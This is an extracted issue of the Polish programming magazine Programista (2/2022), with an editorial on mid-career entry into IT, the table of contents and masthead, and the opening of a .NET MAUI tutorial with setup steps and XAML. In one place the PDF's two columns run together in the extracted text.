PORÓWNANIE TECHNOLOGII JAVASCRIPT DO TWORZENIA APLIKACJI WEBOWYCH | FUSE – IRCFS

Index: 285358 www • programistamag • pl

Magazyn programistów i liderów zespołów IT

2/ 2022 (101) Cena 26,90 zł (w tym VAT 8%)

marzec/ kwiecień

PIERWSZE SPOJRZENIE
NA .NET MAUI

LAT
PROGRAMISTY

Cyber Threat Intelligence Funkcje bezpieczeństwa

– dlaczego jest ważne GitHub Advanced Security

Druk 3D. Jak zrobić coś z niczego

CI/CD jako nowoczesny workflow

#
/* 3 dobre rady dla Marków */
Historia wzięta z życia: Marek – żonaty, dzieciaty, zamieszkujący
przedmieścia dużego miasta. Wiedzie spokojne życie: w tygodniu pra-
ca, w sobotę impreza, w niedzielę kościół. Pracuje w handlu, zajmując
eksponowane stanowisko. Zarabia nieźle, ale raty kredytu nie pozwala-
ją mu konsumować pieniędzy tak, jak by chciał.
Marek jest mądry, więc pewnego dnia postanowił zdywersyfikować
źródło zarobków. „Just in case” – jak mawiają. Przeczytał w inter-
netach, że najlepiej zarabia się w IT. Dodatkowo koledzy handlowcy
utwierdzili go w przekonaniu, że programiści mają teraz jak „pączki
w maśle”. Podobno informatyk, który jeździ czymś słabszym niż Toyo-
ta RAV4, jest nieudacznikiem – podniecali się, popijając poranną kawę.
Zatem IT! – pomyślał.
Marek jest sprytny, więc do wejścia w nową branżę podszedł syste-
mowo: przewertował setki ogłoszeń o pracę dla informatyków i sporzą-
dził listę najbardziej pożądanych specjalizacji. Wyszło mu, że najlepiej
zarabia się, programując w Javie lub .NET. Chociaż PHP lub devopso-
wanie też całkiem nieźle by się kalkulowało. Zapisaną specjalizacjami
kartkę papieru powiesił na ścianie i zaczął planować kolejne kroki.
Marek jest konsekwentny, dlatego nie zniechęcała go wizja niewy-
obrażalnie wielkiego wysiłku poznawania zupełnie obcej mu dziedziny
wiedzy. Był na to przygotowany. I chociaż miał plan i czuł, że sobie
poradzi, to jedno nie dawało mu spokoju: Marek miał 45 lat. Kolejne 2
lata zajmie mu intensywna nauka. W wieku 47 lat zostanie zatrudniony
jako Junior Developer – i to przy założeniu, że nauka rzeczywiście bę-
dzie intensywna. Będzie miał 47 lat i będzie „dopiero” Juniorem. Słabo.
Nauka sama w sobie też nie będzie prosta. Marek ma rodzinę, obo-
wiązki służbowe, dom, balet córki, komunię syna i masę życiowych
spraw do ogarnięcia. A kiedy się uczyć? I chociaż Marek jest niezłom-
ny, to zaczęły targać nim wątpliwości…
Takich Marków w Polsce są setki.
O ile z problemem bycia Juniorem w wieku 47 lat trzeba poradzić
sobie samemu (chociaż nie uważam tego za problem, bo sam wkro-
czyłem w świat informatyki bardzo późno), to sam proces nauki wy-
maga tylko odrobiny organizacji i planowania. Zatem Markowe infor-
matyczne marzenia mają jak najbardziej szansę się urzeczywistnić
(nawet przy tak napiętym harmonogramie życiowych zadań), jeżeli
tylko będzie miał z tyłu głowy kilka ważnych zasad.
Przede wszystkim ważny jest wspomniany już plan (harmonogram)
nauki. Musi być podzielony na etapy: od podstaw do bardziej skom-
plikowanych zagadnień. Kolejny dział konsekwentnie wynikający z po-
przedniego. Najlepiej do tego nadaje się internetowy kurs lub książka.
Chodzi o to, żeby dokładnie widzieć poszczególne etapy nauki. Wie-
dzieć, gdzie będziemy po odhaczeniu jej wszystkich etapów. Dobrą
praktyką jest zaczynanie kursu lub książki od zapoznania się ze spi-
sem treści. Wiemy wtedy, z jakim zakresem wiedzy mamy do czynie-
nia. Zagadnienia same systematyzują się wtedy w głowie. Jak kończy
się jeden kurs, startuje się z drugim. I tak przez dwa lata…
Drugim ojcem sukcesu jest żelazna konsekwencja i systematycz-
ność. Bez niej na nic zda się nawet najciekawszy i najbardziej przy-
stępny w formie kurs lub książka. Jeżeli Marek będzie spędzał na
nauce chociaż 30 minut dziennie, to ma szansę na sukces. Idealnie,
gdyby mógł przeznaczyć na naukę więcej czasu, ale nie zawsze to bę-
dzie możliwe. Nie musi też cały czas siedzieć przy klawiaturze. Może
przeczytać kolejny rozdział książki, czekając w samochodzie na żonę.
Może obejrzeć odcinek kursu, siedząc w toalecie – ale niech codzien-
nie ma kontakt z tematyką, której się uczy.
Zawsze wydawało mi się, że dobrym sposobem na szybką naukę
jest rzucenie na głęboką wodę. Po około półtora roku intensywnej
nauki Marek mógłby spróbować zatrudnić się jako programista. Im
wcześniej zacznie, tym szybciej zadomowi się w branży IT. Codzienny
kontakt ze środowiskiem informatyków znacznie ułatwi przyswajanie
wiedzy, ponieważ nie dojdzie do efektu „wyważania otwartych drzwi”,
czyli samodzielnego odkrywania w informatyce tego, co dawno odkry-
te. Po pewnym czasie płynnie przejdzie z trybu „uczenia się” na tryb
„praca”.
To tyle. Dajesz, Marek!
Piotr Jaworski
/* REKLAMA */
SPIS TREŚCI

01010000
01110010
BIBLIOTEKI I NARZĘDZIA
6 # Pierwsze spojrzenie na .NET MAUI
> Jacek Matulewski

01101111
20 # FUSE – IRCFS
> Paweł "KrzaQ" Zakrzewski

26 # CI/CD jako nowoczesny workflow

01100111
> Michał Zbyl

PROGRAMOWANIE APLIKACJI WEBOWYCH

01110010
40 # Porównanie technologii JavaScript do tworzenia aplikacji webowych
> Joanna Borowska, Rafał Latoszek, Justyna Łapińska, Karol Stasiak

BEZPIECZEŃSTWO

01100001
46 # Cyber Threat Intelligence – czym jest i dlaczego jest ważne
> Tomasz Krawczyk

52 # Funkcje bezpieczeństwa w GitHub Advanced Security

01101101
> Wiktor Szymański, Wojciech Maślanka

Z ARCHIWUM CVE

01101001
62 # Log4j
> Mariusz Zaborski

PLANETA IT

01110011
66 # Druk 3D. Jak zrobić coś z niczego
> Wojciech Sura

BLOCKCHAIN
76 # Blockchain dla mas. O skalowaniu słów kilka
> Przemysław Trepka
01110100
01100001
ZAMÓW PRENUMERATĘ MAGAZYNU PROGRAMISTA

Przez formularz na stronie:.............................http://programistamag.pl/typy-prenumeraty/

Na podstawie faktury Pro-forma:.........................redakcja@programistamag.pl

Prenumerata realizowana jest także przez RUCH S.A.

Zamówienia można składać bezpośrednio na stronie:.......www.prenumerata.ruch.com.pl
Pytania prosimy kierować na adres e-mail:...............prenumerata@ruch.com.pl
Kontakt telefoniczny:...................................801 800 803 lub 22 717 59 59*

*godz. 7 : 00 – 18 : 00 (koszt połączenia wg taryfy operatora)

Magazyn Programista wydawany jest przez Dom Wydawniczy Anna Adamczyk
Wydawca/Redaktor naczelny: Anna Adamczyk (annaadamczyk@programistamag.pl). Redaktor prowadzący:
Mariusz „maryush” Witkowski (mariuszwitkowski@programistamag.pl). Korekta: Tomasz Łopuszański. Kierownik
produkcji/DTP: Krzysztof Kopciowski. Dział reklamy: reklama@programistamag.pl, tel. +48 663 220 102,
tel. +48 604 312 716. Prenumerata: prenumerata@programistamag.pl. Współpraca: Michał Bartyzel, Mariusz
Sieraczkiewicz, Dawid Kaliszewski, Marek Sawerwain, Łukasz Mazur, Łukasz Łopuszański, Jacek Matulewski,
Sławomir Sobótka, Dawid Borycki, Gynvael Coldwind, Bartosz Chrabski, Rafał Kocisz, Michał Sajdak, Michał
Bentkowski, Paweł „KrzaQ” Zakrzewski, Radek Smilgin, Jarosław Jedynak, Damian Bogel (https://kele.codes/),
Michał Zbyl, Dominik 'Disconnect3d' Czarnota. Adres wydawcy: Dereniowa 4/47, 02-776 Warszawa.
Druk: http://www.edit.net.pl/, Nakład: 4500 egz. Projekt okładki: Niko Igorevich/DecimuLabs
Nota prawna
Redakcja zastrzega sobie prawo do skrótów i opracowań tekstów oraz do zmiany planów
wydawniczych, tj. zmian w zapowiadanych tematach artykułów i terminach publikacji, a także
nakładzie i objętości czasopisma.
O ile nie zaznaczono inaczej, wszelkie prawa do materiałów i znaków towarowych/firmowych
zamieszczanych na łamach magazynu Programista są zastrzeżone. Kopiowanie i rozpowszechnianie
ich bez zezwolenia jest Zabronione.
Redakcja magazynu Programista nie ponosi odpowiedzialności za szkody bezpośrednie
i pośrednie, jak również za inne straty i wydatki poniesione w związku z wykorzystaniem informacji
prezentowanych na łamach magazy­nu Programista.
BIBLIOTEKI I NARZĘDZIA

Pierwsze spojrzenie na .NET MAUI

Ten artykuł powstał w styczniu 2022. To ważne, bo nowe wersje zapoznawcze .NET MAUI
powstają i publikowane są dosłownie co chwilę – bieżąca jest już jedenasta. Trzeba się więc
liczyć z tym, że za kilka miesięcy, a w szczególności po oficjalnej premierze, która obecnie
planowana jest na drugi kwartał 2022 roku, wiele jeszcze może się zmienić. Technologia
.NET MAUI (od ang. Multi-platform App UI) to wieloplatformowa technologia umożliwiają-
ca tworzenie aplikacji z graficznym interfejsem użytkownika kompilowanych dla .NET 6. Co
oznacza wieloplatformowa? Obecnie dostępna jest na Windows, Android oraz systemy od
Apple. Może być dostępna także na Linuxach, ale realizacja tego zadania oddana została
w ręce społeczności. Historia .NET MAUI formalnie zaczyna się w 2020 roku, jednak rozwój
tej technologii można też traktować jako kontynuację rozwoju Xamarin.Forms i przeniesienie
jej z Mono do .NET 6.

MAUI
.NET MAUI pozwala tworzyć graficzny interfejs aplikacji przezna-
czonych na różne platformy sprzętowe i systemowe, na których do-
stępne jest .NET 6. Co ważne, możemy to robić bez konieczności
utrzymywania osobnych projektów dla warstwy widoku w każdej
z obsługiwanych platform systemowych. Wcześniej to zadanie reali-
zowało Xamarin.Forms, ale opinie o nim były „różne” – dość wspo-
mnieć, że chyba jednak częściej stosowano osobne projekty warstwy
widoku dla poszczególnych systemów. .NET MAUI ma zastąpić Xa-
marin.Forms i usunąć jego słabości, ale jest przy tym jego ewolucyj-
nym rozwinięciem.
Obsługiwane systemy operacyjne to Android od wersji 5.0 (API 21),
iOS 10 lub nowszy, macOS 10.13 oraz Windows. W tym ostatnim
przypadku chodzi zarówno o tzw. aplikacje „klasyczne” na desktop,
jak i aplikacje uruchamiane na platformie UWP, a więc dystrybuowa-
ne przez Microsoft Store. Poza tym na stronie projektu znajduje się
informacja, że w przyszłości wspierane będą platformy Tizen oraz
Linux. Pierwsza jest systemem operacyjnym stworzonym przez firmę
Samsung na bazie Linuxa i służy do obsługi smartwatchy i SmartTV;
wsparcie dla niej będzie zapewniał właśnie Samsung. Natomiast
wsparcie dla Linuxa ma być całkowicie w rękach społeczności. Na
razie ani Tizen, ani Linux, jak również klasyczny desktopowy Win-
dows, nie są obecne w dotychczas udostępnionych wersjach zapo-
znawczych .NET MAUI.
Aplikacje dla urządzeń mobilnych z systemami Android lub iOS
z interfejsem budowanym za pomocą technologii MAUI mogą być
tworzone za pomocą Visual Studio dla systemów Windows lub macOS
w wersji 2022 Preview. Jednak jeżeli chcemy kompilować aplikacje
dla iOS, musimy mieć również Mac’a z XCode 13.0 Beta 1. Tworzenie
aplikacji MAUI dla Windows i macOS możliwe jest tylko w Visual
Studio dla właściwego systemu.
MAUI unifikuje systemy umożliwiające tworzenie aplikacji z gra-
ficznym interfejsem użytkownika dla wymienionych wyżej platform
w oparciu o język znaczników XAML. Ale nie tylko. Nowością jest
również możliwość wykorzystania języka Blazor, który do tej pory
kojarzyliśmy raczej z aplikacjami webowymi. .NET MAUI bazuje na
rozwinięciu wieloplatformowego .NET Core, które obecnie porzuci-
ło swój przydomek i nazywa się .NET 6, przejmując miejsce dotych-
czasowej flagowej platformy Microsoft .NET Framework. Aplikacje
.NET MAUI mają dostęp do wspólnego dla wszystkich platform
sprzętowych i systemowych zestawu klas .NET 6 (mowa oczywiście
o BCL), który z kolei opiera się o Win32 z UWP w systemie Win-
dows i Mono Runtime w pozostałych systemach. Wyżej są biblioteki
służące do tworzenia aplikacji charakterystyczne dla poszczególnych
systemów, a więc .NET for Android, .NET for iOS, .NET for Mac
i WinUI 3 (z UWP). Na szczęście powyżej tego jest jeszcze nasze .NET
MAUI, które unifikuje tworzenie aplikacji na wszystkich platformach.
Co ciekawe, unifikacja ta nie dotyczy tylko kontrolek, z których
budujemy interfejs. .NET MAUI dostarcza również zunifikowany do-
stęp do sensorów (akcelerometr, żyroskop, kompas itp.), umożliwia
sprawdzanie stanu sieci z wykrywaniem jego zmian, dostęp do infor-
macji o urządzeniu, dostęp do plików i mechanizmów przechowywa-
nia danych, możliwość użycia wbudowanego syntezatora mowy itp.
To oznacza, że, przynajmniej w pewnym zakresie, aplikacje napiszemy
bez konieczności różnicowania kodu dla poszczególnych platform. Na
razie trudno jednak ocenić, na ile jest to wiarygodna obietnica.
Konsekwencją nowego podejścia są rozwiązania, w których apli-
kacja znajduje się w pojedynczym projekcie, w którym różne platfor-
my obsługiwane są w razie konieczności za pomocą „równoległych”
plików umieszczonych w przypisanych platformom podfolderach,
a nie osobnych projektów. To oczywiście powinno uprościć rozwój
niezbyt rozbudowanych aplikacji.
Wartą odnotowania nowością .NET MAUI jest dostosowanie
aplikacji do potrzeb osób z niepełnosprawnościami, w szczególności
wsparcie dla czytników ekranów (ang. screen reader).
Więcej aktualnych informacji można znaleźć na stronie:
https://docs.microsoft.com/pl-pl/dotnet/maui/.

<6> { 2 / 2022 < 101 > }


INSTALACJA VISUAL STUDIO 2022
PREVIEW
Zabawę z .NET MAUI musimy zacząć od instalacji Visual Studio 2022
w wersji Preview (VS). Jest ona konieczna, bo pakiety .NET MAUI
nie są jeszcze dostępne w pełnej wersji tego środowiska. Wersję Pre-
view możemy pobrać za darmo w różnych edycjach (Rysunek 1).
Ja wybrałem Visual Studio Community.
Rysunek 1. Dostępne do pobrania wersje Visual Studio
Podczas instalacji należy wybrać zestawy Opracowywanie aplikacji
mobilnych za pomocą środowiska .NET oraz Programowanie aplikacji
klasycznych dla platformy .NET. Obecnie ten pierwszy zestaw zawie-
ra już domyślnie składniki wymagane do tworzenia aplikacji .NET
MAUI, jednak we wcześniejszych wersjach – albo gdy tę możliwość
chcemy dodać do już zainstalowanego zestawu – należy je dodać sa-
modzielnie. W tym celu w instalatorze należy przejść na zakładkę Po-
Rysunek 2. Pakiety .NET MAUI w Visual Studio 2022 Preview
{ WWW.PROGRAMISTAMAG.PL }
/ Pierwsze spojrzenie na .NET MAUI /
jedyncze składniki i wpisać hasło „MAUI”. Wówczas pojawią się czte-
ry pakiety widoczne na Rysunku 2. Oprócz nich należy zainstalować
także pakiet Android SDK (poziom 31 interfejsu API) – Rysunek 2.
Ale bez obawy, tak wysokie API wcale nie jest potrzebne do urucho-
mienia aplikacji .NET MAUI – wystarczy API 20 odpowiadające An-
droidowi 5.0.
Z góry uprzedzam, że .NET MAUI potrafi być bardzo kapryśne.
Projekty czasem nie chcą się kompilować, choć bez problemu można
je skompilować po ponownym uruchomieniu Visual Studio. Bywa
również tak, że w edytorze są widoczne fragmenty kodu podkreśla-
ne na czerwono, a projekt kompiluje się bez błędów (i podkreślenia
wówczas wcale nie znikają). Przełączanie między platformami także
nie zawsze działa idealnie – po przełączeniu nie można wdrożyć apli-
kacji na wybrany system itd. Należy zatem uzbroić się w cierpliwość,
pamiętając, że nadal mamy do czynienia tylko z wersją zapoznawczą.
TWORZENIE PROJEKTU
Aby przyjrzeć się .NET MAUI, proponuję zbudować prostą aplika-
cję, od której zawsze rozpoczynam poznawanie nowych technologii
pozwalających na tworzenie graficznych interfejsów użytkownika
(GUI). W aplikacji tej za pomocą trzech suwaków będziemy kon-
trolować kolor widocznego w oknie prostokąta. To prosty projekt,
ograniczony wyłącznie do kontrolek i manipulacji nimi bez odwo-
ływania się do bardziej złożonych zagadnień, charakterystycznych
dla poszczególnych platform, ale umożliwia rozpoznanie podstawo-
wych mechanizmów i narzędzi służących do budowania GUI. Zwy-
kle oznacza to naukę wizualnych narzędzi projektowania interfejsów,
które obsługiwane są myszką. Te jednak w przypadku MAUI nie są
jeszcze udostępnione – w chwili pisania tego artykułu nie ma nawet
podglądu projektowanego interfejsu.
<7>
BIBLIOTEKI I NARZĘDZIA
Uruchamiamy Visual Studio 2022 Preview (moja wersja ma nu-
mer 17.1.0 Preview 1.1). Pojawi się okno początkowe (Rysunek 3),
w którym możemy wybrać istniejący lub utworzyć nowy projekt.
Z listy z prawej strony tego okna wybieramy Utwórz nowy projekt.
Na kolejnej stronie, aby wyszukać odpowiedni typ projektu, może-
my wprowadzić „MAUI” w polu edycyjnym i z zaproponowanych
szablonów wybieramy .NET MAUI App (Preview). Klikamy Dalej.
W polu Nazwa projektu wpisujemy „KoloryMAUI” i klikamy Utwórz.
Warto wspomnieć, że jest możliwość wyboru projektu z interfejsem tworzonym w tech-
nologii Blazor, która może być szczególnie atrakcyjna dla osób mających doświadcze-
nie w tworzeniu aplikacji internetowych.
Rysunek 3. Okno początkowe w Visual Studio 2022 Preview
Rysunek 4. Edytor kodu XAML w Visual Studio 2022
<8> { 2 / 2022
Utworzyliśmy projekt o nazwie KoloryMAUI, którego pliki do-
myślnie zostały umieszczone w podkatalogu \source\repos\Projects\
KoloryMAUI\KoloryMAUI katalogu domowego. W katalogu projek-
tu znajdziemy między innymi dwie pary plików: MainPage.xaml/Ma-
inPage.xaml.cs oraz App.xaml/App.xaml.cs. Pierwsza para odpowiada
za zawartość prezentowaną użytkownikowi w GUI, druga – za dzia-
łanie całej aplikacji. W tym artykule skupię się na plikach z pierwszej
pary. To ich zawartość zobaczymy w głównym oknie Visual Studio po
utworzeniu projektu. Widoczne są tam bowiem dwie zakładki o na-
zwach MainPage.xaml i MainPage.xaml.cs (Rysunek 4). Na pierwszej
z nich widzimy kod XAML opisujący wygląd zawartości okna (jak już
wspomniałem, na razie bez podglądu), a na drugiej kod C# związany
z tym oknem. Warto zwrócić uwagę, że inaczej niż w WPF, a podobnie
jak w UWP, pliki te opisują jedynie zawartość okna, a nie samo okno.
Ważną konsekwencją tego faktu jest to, że nie mamy z tego miejsca
dostępu do zdarzeń charakterystycznych dla okna, np. sygnalizujące-
go jego zamknięcie.
Warto także zwrócić uwagę, że w utworzonym rozwiązaniu jest
tylko jeden projekt. Nie ma typowych dla Xamarin wielu osobnych
projektów opisujących warstwę widoku dla poszczególnych plat-
form przy wspólnym projekcie modelu (tak było nawet w projektach
Xamarin.Forms). Pliki specyficzne dla poszczególnych platform kry-
ją się natomiast w folderze Platforms z podfolderami Android, iOS,
MacCatalyst i Windows. Dzięki nim z łatwością można także rozdzie-
lać zasoby dla poszczególnych platform (np. używane pliki graficz-
ne). Oczywiście nic nie stoi na przeszkodzie, abyśmy w miarę roz-
woju aplikacji wyodrębnili do osobnego projektu np. bibliotekę klas,
które będą tworzyły model aplikacji – jej logikę niezależną od GUI;
< 101 > }

nie ma jednak konieczności tworzenia osobnych projektów opisują-
cych GUI na każdej z platform. Ważne jest to, że mimo jednego pro-
jektu, jest on kompilowany osobno dla każdej platformy.
URUCHAMIANIE APLIKACJI
W SYSTEMIE WINDOWS
Warto od razu uruchomić program, aby sprawdzić, czy wszystko jest
w porządku. Proponuję zacząć od systemu Windows, żeby nie zaj-
mować się teraz tworzeniem wirtualnego urządzenia z systemem
Android uruchamianym w emulatorze lub podłączaniem rzeczywi-
stego urządzenia przez kabel USB. Tym zajmiemy się w dalszej części
artykułu.
Czasem zdarza się, że po utworzeniu lub wczytaniu projektu
MAUI nie ma możliwości uruchomienia aplikacji; w pasku narzędzi
VS widoczna jest jedynie opcja Dołącz, pomimo że wszystkie dzia-
łania wykonywane w tle zostały już ukończone. Wówczas zwykle
pomaga ponowne uruchomienie VS i załadowanie projektu. Zdarza
się również, że niemożliwe jest wczytanie wcześniej utworzonego
projektu – VS w nieskończoność wyświetla wówczas okno z napisem
Przygotowywanie rozwiązania…. Zauważyłem, że wówczas działa
taka sztuczka: uruchomienie kolejnej instancji VS bez zamykania
tej pierwszej i wczytanie tego samego projektu. Pierwotną instancję
trzeba niestety potem „zabić” z poziomu menedżera zadań.
Jak już wczytanie projektu do VS się powiedzie, z rozwijanej listy
przy ikonie uruchamiania aplikacji wybierzmy Windows Machine.
To jednak może nie wystarczyć, bo przy próbie kompilacji i wdraża-
nia aplikacji mogą pojawić się błędy związane z wyborem platformy.
Rysunek 6. Rozszerzenie zarządzające jedno-projektowymi rozwiązaniami MAUI
{ WWW.PROGRAMISTAMAG.PL }
/ Pierwsze spojrzenie na .NET MAUI /
Należy wówczas sprawdzić, czy wybrana jest właściwa platforma kom-
pilacji .NET 6, tj. czy jest zgodna z platformą, na której chcemy uru-
chomić aplikację (Rysunek 5). W tej chwili wybór tych dwóch opcji
nie zawsze jest automatycznie korelowany ze sobą przez VS.
Rysunek 5. Wybór platformy, na której chcemy uruchomić aplikację
To jednak nie koniec. Jeżeli pakiety MAUI były doinstalowane już po
zainstalowaniu Visual Studio 2022 Preview, przy próbie uruchomienia
pojawi się komunikat „Projekt nie ma informacji dotyczących uru-
chamiania profilu Windows Machine”. Wówczas należy zainstalować
w VS rozszerzenie o nazwie Single-project MSIX Packaging Tools for
VS 2022. W tym celu z menu Rozszerzenia należy wybrać Zarządzaj
rozszerzeniami i w polu wyszukiwania wprowadzić „Single-project”.
Powinniśmy wówczas zobaczyć właściwy pakiet (Rysunek 6), a na-
stępnie kliknąć Pobierz. Aby instalacja się rozpoczęła, należy zamknąć
całe środowisko VS. Po ponownym jego uruchomieniu i wczytaniu
projektu KoloryMAUI należy przebudować projekt (menu Kompilacja,
pozycja Kompiluj ponownie rozwiązanie lub klawisze Ctrl+Shift+B).
Wówczas wreszcie możemy wcisnąć klawisz F5, aby wdrożyć i uru-
chomić aplikację.
<9>
BIBLIOTEKI I NARZĘDZIA
Przy pierwszym uruchomieniu z VS aplikacji MAUI na danym
komputerze napotkamy ostatni problem, ale już naprawdę drobny.
Aby zainstalować aplikację pod Windows z Visual Studio, musimy
włączyć w systemie Windows tryb programisty (odpowiednie okno
ustawień zostanie automatycznie otwarte – Rysunek 7).
Rysunek 7. Włączanie trybu deweloperskiego w Windows 10
I wówczas wreszcie zobaczymy aplikację MAUI, którą zawiera do-
myślnie utworzony projekt (Rysunek 8). Kosztowało nas to sporo
wysiłku, ale liczę, że tych wszystkich czynności nie będzie trzeba wy-
konywać w finalnej wersji MAUI.
Rysunek 8. Domyślna aplikacja z projektu MAUI utworzonego na podstawie szablonu
(w przypadku aplikacji z interfejsem tworzonym w Blazor domyślny projekt jest inny)
Zaskoczyć może rozmiar folderu z projektem MAUI, który jest ogromny (kilkaset me-
gabajtów). Chcąc go przenieść lub zarchiwizować, można jednak usunąć największe
podfoldery, a mianowicie KoloryMAUI\bin oraz KoloryMAUI\obj\Debug (także Kolo-
ryMAUI\obj\Release, jeżeli skompilujemy projekt w trybie Release). Rozmiar folderu
maleje wówczas do kilku megabajtów.
<10> { 2 / 2022
APLIKACJA STEROWANA
ZDARZENIAMI
Osoby, które dopiero uczą się XAML (w MAUI, WPF lub UWP),
a mają doświadczenie w programowaniu aplikacji „okienkowych”
(np. z użyciem biblioteki Windows Forms lub narzędzi Embarcadero),
najprawdopodobniej przeniosą swoje nawyki i w naturalny sposób za-
czną korzystać ze zdarzeń. To zaprowadzi ich do wzorca, w którym
dane tworzące stan aplikacji i dotycząca ich logika są przechowywane
w klasach widoku, bez żadnej separacji modułów odpowiedzialnych
za poszczególne funkcjonalności projektu. W takim podejściu do
określenia tego, jak aplikacja ma reagować na działania użytkownika,
wykorzystywane są wygodne zdarzenia kontrolek. Brak separacji po-
szczególnych modułów utrudnia jednak testowanie kodu; w prakty-
ce możliwe jest tylko testowanie funkcjonalne całej aplikacji. To nie
musi być złe rozwiązanie. Zgodnie z tym wzorcem aplikacje tworzy
się szybko, szczególnie w początkowej fazie projektu, tzn. zanim okaże
się, że zamawiający chce go jednak znacząco rozbudować lub zmienić.
A zazwyczaj tak jest. Jednak nie tylko rozmiar projektu powinien de-
cydować o wybieranym wzorcu architektonicznym. Nie zawsze warto
dbać o rozdzielanie modułów i najlepsze praktyki. Czasem ważne jest,
aby aplikacja powstała szybko i zadziałała w konkretnym przypadku.
Jeżeli na tym kończy się życie projektu, to wysiłek włożony w jego
„czystość” w żaden sposób nie zaprocentuje. Problem tylko w tym, że,
jak pokazuje praktyka, naprawdę rzadko na tym się kończy – taki pro-
wizoryczny kod trzeba potem często utrzymywać i rozwijać.
PROJEKTOWANIE INTERFEJSU Z MAUI
Jak wspominałem, w obecnej wersji .NET MAUI nie ma jeszcze wi-
doku projektowania, jaki znamy z projektów WPF lub UWP. Nie ma
także możliwości tworzenia interfejsu za pomocą Blend for Visual
Studio 2022 Preview. To może nie jest aż tak wielka strata, skoro i tak
większość programistów bezpośrednio edytuje kod XAML, ale wy-
godnie byłoby mieć chociażby podgląd. Na razie musimy się jednak
obyć bez niego.
Zatem zamiast układać kontrolki za pomocą myszy w widoku
projektowania, przejdźmy od razu do edycji kodu XAML. Usuńmy
domyślny kod, ale nie cały, a jedynie zawartość elementu Grid, zosta-
wiając także otaczający go ScrollView. Ten ostatni element umożli-
wia przewijanie umieszczonej wewnątrz niego zawartości. W miejsce
usuniętego kodu wstawmy kod wyróżniony w Listingu 1, w którym
w pierwszym wierszu siatki umieszczamy prostokąt, a pod nim trzy
suwaki – każdy w osobnym wierszu. Suwaki będą kontrolować skła-
dowe RGB koloru prostokąta. Zwróćmy również uwagę na zmianę
atrybutu RowDefinitions w elemencie Grid. W poniższym i w ko-
lejnych listingach zmiany, jakie należy wprowadzić w kodzie, wyróż-
nione są szarym tłem.
Listing 1. Kod XAML opisujący wygląd okna
<ContentPage
xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
x:Class="KoloryMAUI.MainPage"
BackgroundColor="{DynamicResource SecondaryColor}">
< 101 > }
 / Pierwsze spojrzenie na .NET MAUI /

<ScrollView> Warto zwrócić uwagę na atrybuty elementu Page. Atrybut x:Class

<Grid
RowSpacing="25"
tworzy pomost między elementem Page, określającym opisywaną
RowDefinitions="Auto,Auto,Auto,Auto" w pliku zawartość okna, a klasą C# o nazwie MainPage w przestrzeni
Padding="{OnPlatform iOS='30,60,30,30',
Default='30'}"> nazw KoloryMAUI, której jeszcze nie edytowaliśmy, a która znajduje się
<Rectangle
w pliku MainPage.xaml.cs. Atrybut xmlns (od XML namespace) okre-
Grid.Row="0" śla domyślną przestrzeń nazw używaną w bieżącym elemencie XAML
HeightRequest="300"
Fill="Black" /> i w jego podelementach – w pewnym sensie odpowiada instrukcji
<Slider using w kodzie C#. Z kodu wynika, że dostępne są dwie przestrzenie
Grid.Row="1" />
<Slider nazw. Pierwszą jest przestrzeń domyślna (bez nazwy), zadeklarowana
Grid.Row="2" /> jako http://schemas.microsoft.com/dotnet/2021/maui, która za-
<Slider
Grid.Row="3" /> wiera definicje większości elementów XAML, m.in. Rectangle i Slider.
</Grid> Drugą przestrzenią jest ta dostępna pod nazwą x. To w tej przestrzeni
</ScrollView> zdefiniowany jest atrybut Name. Właśnie dlatego w usuniętym kodzie
</ContentPage>
znajdowały się atrybuty x:Name; za chwilę także i my ich użyjemy.

Usunięcie domyślnego kodu XAML spowoduje, że projektu nie
można będzie skompilować, ponieważ w kodzie C# są odwołania do
nazw usuniętych kontrolek. Niebawem przejdziemy do kodu C# i bę-
dziemy go zmieniać, ale jeżeli kogoś niepokoi niemożność skompilo-
wania projektu, wystarczy usunąć z klasy MainPage (plik MainPage.
xaml.cs) całą metodę OnCounterClicked. Można również usunąć
deklarację pola count.
Osobne podfoldery w folderze Platforms to nie jedyny mechanizm umożliwiający
różnicowanie kodu źródłowego na poszczególne platformy. Sam język XAML został
również wyposażony w możliwość dopasowywania ustawień interfejsu osobno dla
poszczególnych platform. Pozwalają na to klasy OnPlatform i On. W przypad-
ku „jednostronicowych” aplikacji, jak ta przedstawiona w artykule, typowym jest na
przykład zwiększenie górnego marginesu w systemach iOS, aby uniknąć paska stanu
w tym systemie. W rozwiniętej formie ze znacznikami zagnieźdżonymi widoczne jest
to w listingu poniżej, natomiast skrócona wersja widoczna jest w Listingu 1. Klasa
OnPlatform jest typem ogólnym (parametrycznym) z parametrem typu Thickness.
Jej własnością związaną z zawartością jest Platforms, więc choć jest widoczna na
poniższym listingu, może być pominięta. Własność ta jest listą, można więc podać
ustawienia na jedną lub więcej platform, korzystając ze znacznika On. Dostępne plat-
formy to: Android, GTK, iOS, macOS, Tizen, UWP i WPF.
<Grid …>
<Grid.Padding>
<OnPlatform x:TypeArguments="Thickness">
<OnPlatform.Platforms>
<On Platform="iOS" Value="0, 20, 0, 0" />
<On Platform="Android" Value="0, 0, 0, 0" />
<On Platform="UWP" Value="0, 0, 0, 0" />
</OnPlatform.Platforms>
</OnPlatform>
</Grid.Padding>
</Grid>
KILKA UWAG NA TEMAT KODU XAML
Cały kod z pliku MainWindows.xaml jest widoczny w Listingu 1.
Elementem nadrzędnym jest element Page (z ang. strona), reprezen-
tujący zawartość okna aplikacji. W nim zagnieżdżony jest element
ScrollView umożliwiający przewijanie zawartości, jeżeli jest większa
od rozmiaru okna lub ekranu, a w nim element Grid (z ang. siatka),
odpowiadający za ułożenie kontrolek w oknie. To w tym elemencie są
wszystkie kontrolki, które będzie widział użytkownik, czyli prostokąt
i trzy suwaki. Zagnieżdżenie elementów oznacza, że „zewnętrzna”
kontrolka jest pojemnikiem, w którym znajdują się kontrolki repre-
zentowane przez „wewnętrzne” elementy. Przy czym część ustawień
pojemnika jest przekazywana elementom zagnieżdżonym.
W odróżnieniu od aplikacji WPF, w których kod XAML opisuje okno (nadrzędny znacz-
nik w WPF to Window, a nie Page, jak w MAUI i UWP), nie możemy z kodu pliku
MainPage.xaml skutecznie wpływać na tytuł i rozmiar okna. Nie możemy także z tego
poziomu zareagować np. na jego zamknięcie.
NAZWY KONTROLEK I ZDARZENIA
Załóżmy, że projektowanie graficznego interfejsu jest już zakończony.
Kolejnym etapem tworzenia aplikacji jest określenie jej „dynamiki”.
Chcemy, aby suwaki umożliwiały ustalanie koloru prostokąta, a kon-
